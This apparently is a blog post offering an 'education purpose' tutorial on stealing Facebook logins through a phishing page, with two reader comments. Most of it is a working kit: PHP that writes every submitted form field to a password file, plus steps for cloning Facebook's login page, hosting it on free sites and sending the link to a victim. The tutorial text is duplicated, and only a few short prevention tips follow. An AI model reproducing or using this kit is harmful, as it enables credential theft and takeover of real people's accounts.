Hi guys,
this tutorial is only education purpose today i m going to tell you how to hack facebook acount and preventing to himself be victim ..
what is phising ?
Phishing is the act of attempting to acquire sensitive information such as usernames,passwords, and credit cards details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.
1. copy the following code and paste in notepad
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
2 . save as post.php
3 open www.facebook.com
4 .right click and click on view page source.
5 . copy to all content and paste in notepad
6.press (ctrl +f) to find action
7.you will find there like action="https://www.facebook.com/login.php?login_attempt=1"
8.delete all " https......=1" content and write "post.php"
9.save as fb.htm or fb.html as your wish..
10 . now your fake page has created....
11. now you have to upload these files on hosting sites
some free hosting sites
110mb.com
my3gb.com
ripway.com etc.
12. create your accont on hosting site and upload theses file (fb.htm and post.php) in file manager on free hosting site
13 .now click on fb.htm and there will create a link in url and send to victim
14.when victim open this fake page and he will write his credential and on hosting site password.txt file will create and there be stored his credential.
PREVENTION
this tutorial is only education purpose today i m going to tell you how to hack facebook acount and preventing to himself be victim ..
what is phising ?
Phishing is the act of attempting to acquire sensitive information such as usernames,passwords, and credit cards details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.
1. copy the following code and paste in notepad
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
2 . save as post.php
3 open www.facebook.com
4 .right click and click on view page source.
5 . copy to all content and paste in notepad
6.press (ctrl +f) to find action
7.you will find there like action="https://www.facebook.com/login.php?login_attempt=1"
8.delete all " https......=1" content and write "post.php"
9.save as fb.htm or fb.html as your wish..
10 . now your fake page has created....
11. now you have to upload these files on hosting sites
some free hosting sites
110mb.com
my3gb.com
ripway.com etc.
12. create your accont on hosting site and upload theses file (fb.htm and post.php) in file manager on free hosting site
13 .now click on fb.htm and there will create a link in url and send to victim
14.when victim open this fake page and he will write his credential and on hosting site password.txt file will create and there be stored his credential.
PREVENTION
- write first time password always wrong
- check the url when open facebook
- check host file (C:\Windows\System32\drivers\etc\host) where should not written facebook.com or www.facebook.com with ip address.
- use antivirous and antikeylogger
- always use the https:// not http://face.....!
- should not checked keep me login
hi sir nice blog
ReplyDeletethanks sir , joined your workshop ,learned many things and inspired :)
ReplyDelete